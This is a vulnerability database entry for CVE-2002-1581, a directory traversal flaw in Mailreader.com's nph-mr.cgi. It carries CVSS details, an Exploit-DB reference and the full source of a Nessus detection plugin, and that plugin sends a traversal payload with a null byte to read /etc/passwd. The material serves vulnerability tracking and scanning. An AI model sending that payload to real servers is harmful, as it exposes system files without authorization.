Vulnerabilities > CVE-2002-1581

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
NONE
Availability impact
NONE
network
low complexity
mailreader-com
debian
nessus
exploit available

Summary

Directory traversal vulnerability in nph-mr.cgi in Mailreader.com 2.3.20 through 2.3.31 allows remote attackers to view arbitrary files via .. (dot dot) sequences and a null byte (%00) in the configLanguage parameter.

Exploit-Db

descriptionMailReader.com 2.3.x NPH-MR.CGI File Disclosure Vulnerability. CVE-2002-1581. Webapps exploit for cgi platform
idEDB-ID:21966
last seen2016-02-02
modified2002-10-28
published2002-10-28
reporterpokleyzz
sourcehttps://www.exploit-db.com/download/21966/
titleMailReader.com 2.3.x NPH-MR.CGI File Disclosure Vulnerability

Nessus

  • NASL familyCGI abuses
    NASL idMAILREADER.NASL
    descriptionMailreader.com software is installed. A directory traversal flaw allows anybody to read arbitrary files on your system.
    last seen2020-06-01
    modified2020-06-02
    plugin id11780
    published2003-06-26
    reporterThis script is Copyright (C) 2003-2018 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/11780
    titleMailreader 2.3.30 - 2.3.31 Multiple Vulnerabilities
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    # References:
    # Date: Mon, 28 Oct 2002 17:48:04 +0800
    # From: "pokleyzz" <[email protected]>
    # To: "bugtraq" <[email protected]>, 
    #  "Shaharil Abdul Malek" <[email protected]>, 
    #  "sk" <[email protected]>, "pokley" <[email protected]>, 
    #  "Md Nazri Ahmad" <[email protected]> 
    # Subject: SCAN Associates Advisory : Multiple vurnerabilities on mailreader.com
    #
    
    include("compat.inc");
    
    if(description)
    {
      script_id(11780);
      script_version("1.22");
      script_cve_id("CVE-2002-1581", "CVE-2002-1582");
      script_bugtraq_id(5393, 6055, 6058);
    
      script_name(english:"Mailreader 2.3.30 - 2.3.31 Multiple Vulnerabilities");
    
     script_set_attribute(attribute:"synopsis", value:
    "It is possible to access arbitrary file on the remote host." );
     script_set_attribute(attribute:"description", value:
    "Mailreader.com software is installed. A directory traversal flaw 
    allows anybody to read arbitrary files on your system." );
     script_set_attribute(attribute:"solution", value:
    "Upgrade to v2.3.32 or later" );
     script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
     script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
     script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
     script_set_attribute(attribute:"exploit_available", value:"true");
    
     script_set_attribute(attribute:"plugin_publication_date", value: "2003/06/26");
     script_set_attribute(attribute:"vuln_publication_date", value: "2002/10/28");
     script_cvs_date("Date: 2018/06/13 18:56:27");
    script_set_attribute(attribute:"plugin_type", value:"remote");
    script_end_attributes();
    
    
      script_summary(english:"Checks directory traversal & version number of mailreader.com software");
      script_category(ACT_ATTACK);
      script_copyright(english:"This script is Copyright (C) 2003-2018 Tenable Network Security, Inc.");
      script_family(english:"CGI abuses");
      script_dependencie("http_version.nasl", "find_service1.nasl", "no404.nasl", "webmirror.nasl");
      script_require_ports("Services/www", 80);
      script_exclude_keys("Settings/disable_cgi_scanning");
    
      exit(0);
    }
    
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    
    port = get_http_port(default:80);
    
    foreach dir (make_list(cgi_dirs()))
    {
      w = http_send_recv3(method:"GET", port: port, item: strcat(dir, "/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00"));
      if (isnull(w)) exit(1, "The web server on port "+port+" did not answer");
      r2 = strcat(w[0], w[1], '\r\n', w[2]);
      
      if ("Powered by Mailreader.com" >< r2 && r2 =~ "root:[^:]*:0:[01]:")
      {
       security_warning(port);
       exit(0);
      }
    }
    
    
  • NASL familyDebian Local Security Checks
    NASL idDEBIAN_DSA-534.NASL
    descriptionA directory traversal vulnerability was discovered in mailreader whereby remote attackers could view arbitrary files with the privileges of the nph-mr.cgi process (by default, www-data) via relative paths and a null byte in the configLanguage parameter.
    last seen2020-06-01
    modified2020-06-02
    plugin id15371
    published2004-09-29
    reporterThis script is Copyright (C) 2004-2019 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/15371
    titleDebian DSA-534-1 : mailreader - directory traversal